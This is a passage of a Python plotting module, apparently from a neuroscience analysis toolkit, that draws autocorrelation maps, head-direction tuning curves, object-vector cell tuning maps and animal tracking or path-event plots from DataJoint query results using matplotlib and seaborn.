entry = (self.dj_object & key).fetch1()
else:
entry = key
# Check for custom styling
if self.style in styles:
axes_color = styles[self.style].get('axes_color_autocorr', AXES_COLOR_ACORR)
else:
axes_color = AXES_COLOR_ACORR
plot_counter += 1
if not external_axis:
ax = figure.add_subplot(5,5,plot_counter)
ax.imshow(entry['acorr'], cmap=cmap)
ax.set_aspect('equal')
ax.get_xaxis().set_ticks([]);ax.get_yaxis().set_ticks([])
if display_title:
title = self.__title(entry, display_score, hash_or_animal)
ax.set_title(title)
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(axes_lw)
ax.spines[axis].set_color(AXES_COLOR_ACORR)
if plot_counter >= self.plots_per_view:
if (self.save_path is not None) and not external_axis:
print('Saving figure under {}'.format(str(self.save_path)))
if plot_counter < 2:
# Show the actual cell ids in export path
export_name = f'autocorr {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
else:
export_name = f'autocorr n={plot_counter}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
plot_counter = 0
# Create next figure
if not external_axis:
figure = self.__create_figure_grid
return
def hdtuning(self, **kwargs):
'''
Plot HD tuning curves and occupancy
Optionally shows score for every subplot if available.
Parameters
----------
**kwargs:
hash_or_animal: string
'hash' or 'animal'
Determines whether session name (hash) or animal/timestamp
combination should be displayed in title of each subplot.
Defaults to 'animal'
display_score : string
Name of the score (=column name) to display in title
of each subplot.
Defaults to None.
color_hd : Show colored line for hd tuning curve according to average angle?
cmap : string
(for 'color_hd') : Valid matplotlib colormap string
https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
or https://github.com/1313e/CMasher
line_width : float
Line width of tuning curve
only_occupancy: bool
If True draws only occupancy, not actual tuning of cell
display_title : bool
Show title?
ax : axis
Matplotlib axis to draw into
'''
# Process kwargs
display_score = kwargs.get('display_score', None)
hash_or_animal = kwargs.get('hash_or_animal', 'animal')
color_hd = kwargs.get('color_hd', False)
cmap = kwargs.get('cmap', sns.husl_palette(as_cmap=True))
only_occupancy = kwargs.get('only_occupancy', False)
display_title = kwargs.get('display_title', True)
line_width = kwargs.get('line_width', 3.)
ax = kwargs.get('ax', None)
# Prepare list of attributes to check:
ATTR_HDTUNING = self.ATTR_HDTUNING.copy()
# Display session hash or animal_name/timestamp?
if hash_or_animal == 'hash':
ATTR_HDTUNING.append(self.RECORDING_HASH)
elif hash_or_animal == 'animal':
ATTR_HDTUNING.append(self.ANIMAL_NAME)
ATTR_HDTUNING.append(self.TIMESTAMP)
else:
raise NameError(f'Keyword "{hash_or_animal}" not recognized')
# Display a score?
if display_score is not None and isinstance(display_score, str):
ATTR_HDTUNING.append(display_score)
else:
display_score = None
if only_occupancy:
ATTR_HDTUNING.remove('angular_tuning')
if color_hd:
ATTR_HDTUNING.append('angular_mean')
# Check attributes in datajoint join
if not self.__check_join_integrity(ATTR_HDTUNING):
raise KeyError('One or more of these were not found: {}'.format(ATTR_HDTUNING))
###########################################################################
############### START PLOTTING FUNCTIONS
plot_counter = 0
if self.keys is not None:
iterator = self.keys
use_keys = True
else:
iterator = self.dj_object
use_keys = False
if self.total is not None:
total = self.total
else:
total = len(iterator)
if (ax is not None) and (total > 1):
raise NotImplementedError(f'Axis was given, and total number of plots = {total}.\
\nMake sure you have only one element to plot!')
elif ax is not None:
external_axis = True
elif ax is None:
external_axis = False
# Make loop with tqdm progress bar
tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing HD tuning')
if not external_axis:
figure = self.__create_figure_grid
for no, key in tqdm_iterator:
if no == total:
if (plot_counter > 0) and not external_axis:
if self.save_path is not None:
print('Saving figure under {}'.format(str(self.save_path)))
if plot_counter < 2:
# Show the actual cell ids in export path
export_name = f'hdtuning {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
else:
export_name = f'hdtuning n={plot_counter}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
# Premature stop? Make sure you close things gracefully:
tqdm_iterator.refresh()
tqdm._instances.clear()
break
# Use keys or join object?
if use_keys:
entry = (self.dj_object & key).fetch1()
else:
entry = key
plot_counter +=1
if not external_axis:
ax = figure.add_subplot(5,5,plot_counter, projection='polar')
else:
assert 'theta_direction' in ax.properties(), 'Given axis is not polar. Make sure you initialize with "projection=polar"'
# Check for custom styling
if self.style in styles:
color_line_hd = styles[self.style].get('color_line_hd', COLOR_LINE_HD)
color_line_hd_occ = styles[self.style].get('color_line_hd_occ', COLOR_LINE_HD_OCC)
else:
color_line_hd = COLOR_LINE_HD
color_line_hd_occ = COLOR_LINE_HD_OCC
# Color?
# This partially overwrites the stylesheet selection above
if color_hd:
color_line_hd = make_circular_colormap(np.array([entry['angular_mean']]), cmap=cmap)[0]
line_width_ = line_width * 1.5 # Otherwise difficult to see the color
else:
line_width_ = line_width
ax.plot(entry['angle_centers'],
entry['angular_occupancy']/np.nanmax(entry['angular_occupancy']),
color=color_line_hd_occ,
alpha=[1. if only_occupancy else .4][0],
lw=line_width_)
ax.plot(entry['angle_centers'],
entry['angular_tuning']/np.nanmax(entry['angular_tuning']),
color=color_line_hd,
lw=line_width_,
alpha=.85)
if only_occupancy:
del ax.lines[1] # Get rid of second drawn line, i.e. the actual tuning curve. This keeps the y axis scaling intact.
ax.set_aspect('equal')
ax.set_theta_zero_location("S")
ax.get_yaxis().set_ticks([])
ax.tick_params(labelbottom=False)
ax.spines['polar'].set_visible(False)
if display_title:
# Get subplot title
title = self.__title(entry, display_score, hash_or_animal)
ax.set_title(title, y=1.1)
if plot_counter >= self.plots_per_view:
if (self.save_path is not None) and not external_axis:
print('Saving figure under {}'.format(str(self.save_path)))
if plot_counter < 2:
# Show the actual cell ids in export path
export_name = f'hdtuning {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
else:
export_name = f'hdtuning n={plot_counter}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
plot_counter = 0
# Create next figure
if not external_axis:
figure = self.__create_figure_grid
return
###########################################################################
def tuningmaps_ov(self, **kwargs):
'''
SPECIAL!
- This function gets data for each session
Plot tuningmaps for object vector (ov) cells (1x3):
- base_session
- object1_session
- object2_session
Optionally shows score if available.
Parameters
----------
**kwargs:
cmap : string
Valid matplotlib colormap string
https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
or https://github.com/1313e/CMasher
hash_or_animal: string
'hash' or 'animal'
Determines whether session name (hash) or animal/timestamp
combination should be displayed in title of each subplot.
Defaults to 'animal'
display_score : string
Name of the score (=column name) to display in title
of each subplot.
Defaults to None.
axes_lw : float
axes linewidth. Default 5.
display_title : bool
Show title?
cue_card_pos : list or string
Cue card position in (tracked) field ['north','south','west','east']
hide_cbar_axis: boolean
Hide the colorbar axis label(s)?
'''
# Process kwargs
cmap = kwargs.get('cmap', 'magma')
cmap = plt.get_cmap(cmap)
display_score = kwargs.get('display_score', None)
hash_or_animal = kwargs.get('hash_or_animal', 'animal')
axes_lw = kwargs.get('axes_lw', 5.)
normalize_base = kwargs.get('normalize_base', True)
display_title = kwargs.get('display_title', True)
cue_card_pos = kwargs.get('cue_card_pos', None)
hide_cbar_axis = kwargs.get('hide_cbar_axis', False)
# Prepare list of attributes to check:
ATTR_TUNINGMAP_OV = self.ATTR_TUNINGMAP_OV.copy()
# Display session hash or animal_name/timestamp?
if hash_or_animal == 'hash':
ATTR_TUNINGMAP_OV.append(self.RECORDING_HASH_OV)
elif hash_or_animal == 'animal':
ATTR_TUNINGMAP_OV.append(self.ANIMAL_NAME)
ATTR_TUNINGMAP_OV.append(self.TIMESTAMP)
else:
raise NameError(f'Keyword "{hash_or_animal}" not recognized')
# Display a score?
if display_score is not None and isinstance(display_score, str):
ATTR_TUNINGMAP_OV.append(display_score)
else:
display_score = None
# Check attributes in datajoint join
if not self.__check_join_integrity(ATTR_TUNINGMAP_OV):
raise KeyError('One or more of these were not found: {}'.format(ATTR_TUNINGMAP_OV))
###########################################################################
############### START PLOTTING FUNCTIONS
if self.keys is not None:
iterator = self.keys
use_keys = True
else:
iterator = self.dj_object
use_keys = False
if self.total is not None:
total = self.total
else:
total = len(iterator)
# Cue card positions
if cue_card_pos is not None:
if isinstance(cue_card_pos, str):
cue_card_pos = [cue_card_pos] * total
else:
assert len(cue_card_pos) == total, \
'Length of cue card position array does not match length of cells to plot'
# Make loop with tqdm progress bar
tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing tuningmaps')
for no, key in tqdm_iterator:
if no == total:
# Premature stop? Make sure you close things gracefully:
tqdm_iterator.refresh()
tqdm._instances.clear()
plt.close()
break
# Use keys or join object?
if use_keys:
entry = (self.dj_object & key).fetch1()
else:
entry = key
# Get session dictionary object vector
recording_dict = make_multi_recording_object_dict(entry)
recording_dict, max_rm = _get_ovc_tuningmaps(recording_dict, entry) # Returns tuningmaps and object positions and max over tuningmaps
if recording_dict['object1']['recording_name'] == recording_dict['object2']['recording_name']:
two_object_sess = True # This is a "special case" -> 2 objects in one session
figure = self.__create_figure_grid_ov_2
ax_base = figure.add_subplot(1,2,1)
ax_object1 = figure.add_subplot(1,2,2)
else:
# 2 separate object sessions
two_object_sess = False
figure = self.__create_figure_grid_ov_3
ax_base = figure.add_subplot(1,3,1)
ax_object1 = figure.add_subplot(1,3,2)
ax_object2 = figure.add_subplot(1,3,3)
# Fill axes
if normalize_base:
rm1 = ax_base.imshow(recording_dict['base']['tuningmap'], vmin=0, vmax=max_rm, cmap=cmap) # Normalized view
rm2 = ax_object1.imshow(recording_dict['object1']['tuningmap'], vmin=0, vmax=max_rm, cmap=cmap)
if not two_object_sess:
rm3 = ax_object2.imshow(recording_dict['object2']['tuningmap'], vmin=0, vmax=max_rm, cmap=cmap)
else:
rm1 = ax_base.imshow(recording_dict['base']['tuningmap'], cmap=cmap)
rm2 = ax_object1.imshow(recording_dict['object1']['tuningmap'], cmap=cmap)
if not two_object_sess:
rm3 = ax_object2.imshow(recording_dict['object2']['tuningmap'], cmap=cmap)
# Draw objects
ax_object1.scatter(recording_dict['object1']['object_x_rm'], recording_dict['object1']['object_y_rm'], marker='s', s=800, color='k')
ax_object1.scatter(recording_dict['object1']['object_x_rm'], recording_dict['object1']['object_y_rm'], marker='s', s=500, color='#ccc')
ax_object1.scatter(recording_dict['object1']['object_x_rm'], recording_dict['object1']['object_y_rm'], marker='s', s=300, color='w')
ax_object1.scatter(recording_dict['object1']['object_x_rm'], recording_dict['object1']['object_y_rm'], marker='x', s=100, color='k')
if not two_object_sess:
ax_object2.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=800, color='k')
ax_object2.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=500, color='#ccc')
ax_object2.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=300, color='w')
ax_object2.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='x', s=100, color='k')
else:
# Draw second object into object 1 session axis
ax_object1.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=800, color='k')
ax_object1.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=500, color='#ccc')
ax_object1.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=300, color='w')
ax_object1.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='x', s=100, color='k')
ax_base.set_aspect('equal')
ax_base.get_xaxis().set_ticks([]); ax_base.get_yaxis().set_ticks([])
ax_object1.set_aspect('equal')
ax_object1.get_xaxis().set_ticks([]); ax_object1.get_yaxis().set_ticks([])
if not two_object_sess:
ax_object2.set_aspect('equal')
ax_object2.get_xaxis().set_ticks([]); ax_object2.get_yaxis().set_ticks([])
# Check for custom styling
if self.style in styles:
cc_color = styles[self.style].get('cue_card_color_tuningmap', CUE_CARD_COLOR_TM)
axes_color = styles[self.style].get('axes_color_tuningmap', AXES_COLOR_TM)
else:
cc_color = CUE_CARD_COLOR_TM
axes_color = AXES_COLOR_TM
# Axes linewidth
for axis in ['top','bottom','left','right']:
ax_base.spines[axis].set_linewidth(axes_lw)
ax_object1.spines[axis].set_linewidth(axes_lw)
ax_object1.spines[axis].set_color(axes_color)
if not two_object_sess:
ax_object2.spines[axis].set_linewidth(axes_lw)
ax_object2.spines[axis].set_color(axes_color)
# Draw cue card?
if cue_card_pos is not None:
size = recording_dict['base']['tuningmap'].shape # Just take one of them for now - should be fine
card_pos = cue_card_pos[no]
if card_pos == 'west':
ax_base.plot([0.,0.],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
ax_object1.plot([0.,0.],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
if not two_object_sess:
ax_object2.plot([0.,0.],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
elif card_pos == 'east':
ax_base.plot([size[1]-1,size[1]-1],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
ax_object1.plot([size[1]-1,size[1]-1],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
if not two_object_sess:
ax_object2.plot([size[1]-1,size[1]-1],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
elif card_pos == 'north':
ax_base.plot([size[1]/2-5,size[1]/2+5],[0,0], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
ax_object1.plot([size[1]/2-5,size[1]/2+5],[0,0], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
if not two_object_sess:
ax_object2.plot([size[1]/2-5,size[1]/2+5],[0,0], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
elif card_pos == 'south':
ax_base.plot([size[1]/2-5,size[1]/2+5],[size[0]-1,size[0]-1], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
ax_object1.plot([size[1]/2-5,size[1]/2+5],[size[0]-1,size[0]-1], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
if not two_object_sess:
ax_object2.plot([size[1]/2-5,size[1]/2+5],[size[0]-1,size[0]-1], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
else:
raise NotImplementedError(f'Card position {card_pos} not understood. Choose ["west","east","north","south"]')
# Create colorbars
#plt.colorbar(rm1, ax=ax_base, fraction=0.03)
if not two_object_sess:
cbar_axes = [ax_base, ax_object1, ax_object2]
rms = [rm1, rm2, rm3]
else:
cbar_axes = [ax_base, ax_object1]
rms = [rm1, rm2]
last_rm = rms[-1]
for ax_, rm_ in zip(cbar_axes,rms):
divider = make_axes_locatable(ax_)
cax = divider.append_axes("right", size="6%", pad=0.11)
cbar = plt.colorbar(rm_, cax=cax)
cbar.outline.set_visible(False)
if hide_cbar_axis:
#cbar.ax.set_ticks()
cbar.ax.set_yticklabels([])
else:
cbar.ax.tick_params(labelsize=18)
if normalize_base and (rm_ != last_rm):
cbar.remove()
# Add title
if display_title:
# Get subplot title
title = self.__title(entry, display_score, hash_or_animal, ov=True)
ax_base.set_title(title)
plt.subplots_adjust(wspace=.1)
if self.save_path is not None:
print('Saving figure under {}'.format(str(self.save_path)))
export_name = f'tuningmaps ov {key["base_session"]} cell {key["cell_id"]}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
return
def tracking(self, **kwargs):
'''
Plot tracking plots in 5x5 grid
Optionally shows score for every subplot if available.
! This uses self.path_event(draw_events=False) to generate plots.
Parameters
----------
**kwargs:
cmap : string
Valid matplotlib colormap string
https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
or https://github.com/1313e/CMasher
hash_or_animal: string
'hash' or 'animal'
Determines whether session name (hash) or animal/timestamp
combination should be displayed in title of each subplot.
Defaults to 'animal'
display_score : string
Name of the score (=column name) to display in title
of each subplot.
Defaults to None.
draw_speed : bool
Encode speed in size of dots in plot?
path_dot_size : int (float)
If draw_speed==False: Dot size for tracking
draw_angle : bool
Encode angle in color of dots in plot?
speed_scaler : float
How much smaller than actual speed should dot size be?
alpha_path : float
Transparency of lines
display_title : bool
Show title?
ax : axis
Matplotlib axis to draw into
'''
# Process kwargs
cmap = kwargs.get('cmap', sns.husl_palette(as_cmap=True))
cmap = plt.get_cmap(cmap)
display_score = kwargs.get('display_score', None)
hash_or_animal = kwargs.get('hash_or_animal', 'animal')
draw_speed = kwargs.get('draw_speed', False)
path_dot_size = kwargs.get('path_dot_size', 1.2)
draw_angle = kwargs.get('draw_angle', False)
speed_scaler = kwargs.get('speed_scaler', .5)
alpha_path = kwargs.get('alpha_path', 1)
display_title = kwargs.get('display_title', True)
ax = kwargs.get('ax', None)
self.path_event(draw_events=False, cmap=cmap, \
display_score=display_score, hash_or_animal=hash_or_animal,
draw_speed=draw_speed, path_dot_size=path_dot_size,
draw_angle=draw_angle, speed_scaler=speed_scaler, alpha_path=alpha_path,
display_title=display_title, ax=ax)
return
def path_event(self, **kwargs):
'''
Plot path-event plots in 5x5 grid
Optionally shows score for every subplot if available.
! This is used also as plotting container function for self.tracking().
Parameters
----------
**kwargs:
cmap : string
Valid matplotlib colormap string
https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
or https://github.com/1313e/CMasher
hash_or_animal: string
'hash' or 'animal'
Determines whether session name (hash) or animal/timestamp
combination should be displayed in title of each subplot.
Defaults to 'animal'
display_score : string
Name of the score (=column name) to display in title
of each subplot.
Defaults to None.
draw_events : bool
Show events?
draw_speed : bool
Encode speed in size of dots in path plot?
draw_angle : bool
Encode angle in color of dots in plot?
draw_time : bool
Encode time since session start in color of dots?
path_dot_size : int (float)
If draw_speed==False: Dot size for tracking
draw_hd : bool
Encode angle in color of dots in plot?
If draw_events==False this will color the path plot
If draw_events==True this will color the events
speed_scaler : float
How much smaller than actual speed should dot size be?
event_scaler : float
How much smaller than actual event size should the dot be?
event_color : list/string
Valid color for events; defaults to 'k'
alpha_path : float
alpha_events : float
display_title : bool
Show title?
ax : axis
Matplotlib axis to draw into
'''
# Process kwargs
cmap = kwargs.get('cmap', sns.husl_palette(as_cmap=True))
display_score = kwargs.get('display_score', None)
hash_or_animal = kwargs.get('hash_or_animal', 'animal')
draw_events = kwargs.get('draw_events',True)
draw_speed = kwargs.get('draw_speed', False)
draw_angle = kwargs.get('draw_angle', False)
draw_time = kwargs.get('draw_time', False)
path_dot_size = kwargs.get('path_dot_size', 1.2)
draw_hd = kwargs.get('draw_hd', False)
speed_scaler = kwargs.get('speed_scaler', .5)
event_scaler = kwargs.get('event_scaler', 80)
event_color = kwargs.get('event_color', EVENT)
alpha_path = kwargs.get('alpha_path', 1)
alpha_events = kwargs.get('alpha_events', .7)
display_title = kwargs.get('display_title', True)
ax = kwargs.get('ax', None)
# Prepare colormap (cmap)
# for feeding make_circular_colormap or make_linear_colormap below
try:
cmap = list(sns.color_palette(cmap, 256))
except TypeError:
cmap = plt.get_cmap(cmap).colors
# Prepare list of attributes to check:
if draw_events:
ATTR_PATHEVENT = self.ATTR_PATHEVENT.copy()
else:
# If no events should be shown, use a short TRACKING attributes list
ATTR_PATHEVENT = self.ATTR_TRACKING.copy()
# Display session hash or animal_name/timestamp?
if hash_or_animal == 'hash':
ATTR_PATHEVENT.append(self.RECORDING_HASH)
elif hash_or_animal == 'animal':
ATTR_PATHEVENT.append(self.ANIMAL_NAME)
ATTR_PATHEVENT.append(self.TIMESTAMP)
else:
raise NameError(f'Keyword "{hash_or_animal}" not recognized')
# Display a score?
if display_score is not None and isinstance(display_score, str):
ATTR_PATHEVENT.append(display_score)
else:
display_score = None
if draw_speed:
ATTR_PATHEVENT.append('speed')
if draw_hd or draw_angle:
ATTR_PATHEVENT.append('head_angle')
# Check attributes in datajoint join
if not self.__check_join_integrity(ATTR_PATHEVENT):
raise KeyError('One or more of these were not found: {}'.format(ATTR_PATHEVENT))
###########################################################################
############### START PLOTTING FUNCTIONS
plot_counter = 0
if self.keys is not None:
iterator = self.keys
use_keys = True
else:
iterator = self.dj_object
use_keys = False
if self.total is not None:
total = self.total
else:
total = len(iterator)
if (ax is not None) and (total > 1):
raise NotImplementedError(f'Axis was given, and total number of plots = {total}.\
\nMake sure you have only one element to plot!')
elif ax is not None:
external_axis = True
elif ax is None:
external_axis = False
# Make loop with tqdm progress bar
tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing path-event plots')
if not external_axis:
figure = self.__create_figure_grid
for no, key in tqdm_iterator:
if no == total:
if (plot_counter > 0) and not external_axis:
if self.save_path is not None:
print('Saving figure under {}'.format(str(self.save_path)))
if plot_counter < 2:
# Show the actual cell ids in export path
export_name = f'pathevent {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
else:
export_name = f'pathevent n={plot_counter}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
# Premature stop? Make sure you close things gracefully:
tqdm_iterator.refresh()
tqdm._instances.clear()
break
# Use keys or join object?
if use_keys:
entry = (self.dj_object & key).fetch1()
else:
entry = key
plot_counter +=1
if not external_axis:
ax = figure.add_subplot(5,5,plot_counter)
# Check for custom styling
if self.style in styles:
path_color = styles[self.style].get('path_color', PATH)
path_event_color = styles[self.style].get('path_event_color', PATH_EVENT)
path_event_hd_color = styles[self.style].get('path_event_hd_color', PATH_EVENT_HD)
event_color = styles[self.style].get('event_color', EVENT)
else:
path_color = PATH
path_event_color = PATH_EVENT
path_event_hd_color = PATH_EVENT_HD
event_color = EVENT
if not draw_events:
ax.scatter(entry['x_pos'], entry['y_pos'],
s=[path_dot_size if not draw_speed else (entry['speed']/np.percentile(entry['speed'],95))/speed_scaler],
c=[[path_color] if not any([draw_angle, draw_hd]) else make_circular_colormap(entry['head_angle'], cmap=cmap)][0],
lw=0,
alpha=alpha_path)
else:
if not len(entry['x_pos_signal']):
continue
ax.scatter(entry['x_pos'], entry['y_pos'],
s=[path_dot_size if not draw_speed else (entry['speed']/np.percentile(entry['speed'],95))/speed_scaler],
c=[path_event_color if not draw_hd else path_event_hd_color][0],
lw=0,
alpha=alpha_path)
assert (np.array([draw_hd, draw_time]) == True).all() == False, 'Draw time and hd are both true - choose one'
if draw_hd:
colors_events = make_circular_colormap(entry['head_angle_signal'],
cmap=cmap)
elif draw_time:
indices_signal = get_signal_indices(entry['x_pos_signal'],
entry['x_pos'])
colors_events = make_linear_colormap(indices_signal,
reference_numbers=np.arange(len(entry['x_pos'])),
cmap=cmap)
else:
colors_events = [[event_color] if isinstance(event_color,list) else event_color][0]
# Draw signal ...
scaled_signal = (entry['signal']/np.percentile(entry['signal'],95))*event_scaler
ax.scatter(entry['x_pos_signal'],
entry['y_pos_signal'],
s=scaled_signal,
c=colors_events,
lw=0,
alpha=alpha_events)
ax.set_aspect('equal')
ax.autoscale(enable=True, tight=True)
ax.invert_yaxis()
ax.get_xaxis().set_ticks([]);ax.get_yaxis().set_ticks([])
if display_title:
title = self.__title(entry, display_score, hash_or_animal, show_cell=draw_events)
ax.set_title(title)
sns.despine(left=True, bottom=True)
if plot_counter >= self.plots_per_view:
if (self.save_path is not None) and not external_axis:
print('Saving figure under {}'.format(str(self.save_path)))
if plot_counter < 2:
# Show the actual cell ids in export path
if not draw_events:
export_name = f'path {key["recording_name"]}.{self.save_format}'
else:
export_name = f'pathevent {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
else:
if not draw_events:
export_name = f'path n={plot_counter}.{self.save_format}'
else:
export_name = f'pathevent n={plot_counter}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
plot_counter = 0
# Create next figure
if not external_axis:
figure = self.__create_figure_grid
return
def path_event_ov(self, **kwargs):
'''
SPECIAL!
- This function gets data for each session
Plot path-event plots for object vector (ov) cells (1x3):
- base_session
- object1_session
- object2_session
Parameters
----------
**kwargs:
cmap : string
Valid matplotlib colormap string
https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
or https://github.com/1313e/CMasher
hash_or_animal: string
'hash' or 'animal'
Determines whether session name (hash) or animal/timestamp
combination should be displayed in title of each subplot.
Defaults to 'animal'
display_score : string
Name of the score (=column name) to display in title
of each subplot.
Defaults to None.
draw_events : bool
Show events?
draw_speed : bool
Encode speed in size of dots in path plot?
path_dot_size : int (float)
If draw_speed==False: Dot size for tracking
draw_hd : bool
Encode angle in color of dots in plot?
If draw_events==False this will color the path plot
If draw_events==True this will color the events
speed_scaler : float
How much smaller than actual speed should dot size be?
event_scaler : float
How much smaller than actual event size should the dot be?
event_color : list/string
Valid color for events; defaults to 'k'
alpha_path : float
alpha_events : float
display_title : bool
Show title?
'''
# Process kwargs
cmap = kwargs.get('cmap', 'magma')
cmap = plt.get_cmap(cmap)
display_score = kwargs.get('display_score', None)
hash_or_animal = kwargs.get('hash_or_animal', 'animal')
draw_events = kwargs.get('draw_events',True)
draw_speed = kwargs.get('draw_speed', False)
path_dot_size = kwargs.get('path_dot_size', 1.2)
draw_hd = kwargs.get('draw_hd', False)
speed_scaler = kwargs.get('speed_scaler', .5)
event_scaler = kwargs.get('event_scaler', 80)
event_color = kwargs.get('event_color',EVENT)
alpha_path = kwargs.get('alpha_path', 1)
alpha_events = kwargs.get('alpha_events', .7)
display_title = kwargs.get('display_title', True)
ATTR_PATHEVENT_OV = self.ATTR_PATHEVENT_OV.copy()
# Display session hash or animal_name/timestamp?
if hash_or_animal == 'hash':
ATTR_PATHEVENT_OV.append(self.RECORDING_HASH_OV)
elif hash_or_animal == 'animal':
ATTR_PATHEVENT_OV.append(self.ANIMAL_NAME)
ATTR_PATHEVENT_OV.append(self.TIMESTAMP)
else:
raise NameError(f'Keyword "{hash_or_animal}" not recognized')
# Display a score?
if display_score is not None and isinstance(display_score, str):
ATTR_PATHEVENT_OV.append(display_score)
else:
display_score = None
# Check attributes in datajoint join
if not self.__check_join_integrity(ATTR_PATHEVENT_OV):
raise KeyError('One or more of these were not found: {}'.format(ATTR_PATHEVENT_OV))
###########################################################################
############### START PLOTTING FUNCTIONS
if self.keys is not None:
iterator = self.keys
use_keys = True
else:
iterator = self.dj_object
use_keys = False
if self.total is not None:
total = self.total
else:
total = len(iterator)
# Make loop with tqdm progress bar
tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing path-event plots')
for no, key in tqdm_iterator:
if no == total:
# Premature stop? Make sure you close things gracefully:
tqdm_iterator.refresh()
tqdm._instances.clear()
plt.close()
break
# Use keys or join object?
if use_keys:
entry = (self.dj_object & key).fetch1()
else:
entry = key
# Get session dictionary object vector
recording_dict = make_multi_recording_object_dict(entry)
recording_dict = _get_ovc_tracking_signal(recording_dict, entry) # Returns tracking and signal
if recording_dict['object1']['recording_name'] == recording_dict['object2']['recording_name']:
two_object_sess = True # This is a "special case" -> 2 objects in one session
figure = self.__create_figure_grid_ov_2
ax_base = figure.add_subplot(1,2,1)
ax_object1 = figure.add_subplot(1,2,2)
axes = [ax_base, ax_object1]
sessions = ['base', 'object1']
else:
# 2 separate object sessions
two_object_sess = False
figure = self.__create_figure_grid_ov_3
ax_base = figure.add_subplot(1,3,1)
ax_object1 = figure.add_subplot(1,3,2)
ax_object2 = figure.add_subplot(1,3,3)
axes = [ax_base, ax_object1, ax_object2]
sessions = ['base', 'object1', 'object2']
# Check for custom styling
if self.style in styles:
path_color = styles[self.style].get('path_color', PATH)
path_event_color = styles[self.style].get('path_event_color', PATH_EVENT)
path_event_hd_color = styles[self.style].get('path_event_hd_color', PATH_EVENT_HD)
event_color = styles[self.style].get('event_color', EVENT)
else:
path_color = PATH
path_event_color = PATH_EVENT
path_event_hd_color = PATH_EVENT_HD
event_color = EVENT
# Get subplot title
title = self.__title(entry, display_score, hash_or_animal, show_cell=draw_events, ov=True)
for ax, session in zip(axes, sessions):
if not draw_events:
ax.scatter(recording_dict[session]['tracking']['x_pos'],
recording_dict[session]['tracking']['y_pos'],
s=[path_dot_size if not draw_speed else \
(recording_dict[session]['tracking']['speed']/np.percentile(recording_dict[session]['tracking']['speed'],95))/speed_scaler],
c=[[path_color] if not draw_hd else make_circular_colormap(recording_dict[session]['tracking']['head_angle'], cmap=cmap)][0],
lw=0,
alpha=alpha_path)
else:
ax.scatter(recording_dict[session]['tracking']['x_pos'],
recording_dict[session]['tracking']['y_pos'],
s=[path_dot_size if not draw_speed else (recording_dict[session]['tracking']['speed']/np.percentile(recording_dict[session]['tracking']['speed'],95))/speed_scaler],
c=[path_event_color if not draw_hd else path_event_hd_color][0],
lw=0,
alpha=alpha_path)
if draw_hd:
colors_events = make_circular_colormap(recording_dict[session]['signal']['head_angle_signal'])
else:
colors_events = [[event_color] if isinstance(event_color,list) else event_color][0]
# Draw signal ...
scaled_signal = (recording_dict[session]['signal']['signal']/np.percentile(recording_dict[session]['signal']['signal'],95))*event_scaler
ax.scatter(recording_dict[session]['signal']['x_pos_signal'], recording_dict[session]['signal']['y_pos_signal'],
s=scaled_signal,
c=colors_events,
lw=0,
alpha=alpha_events)
ax.set_aspect('equal')
ax.autoscale(enable=True, tight=True)
ax.invert_yaxis()
ax.get_xaxis().set_ticks([]);ax.get_yaxis().set_ticks([])
# Add title
if display_title:
# Get subplot title
title = self.__title(entry, display_score, hash_or_animal, ov=True)
ax_base.set_title(title)
sns.despine(left=True, bottom=True)
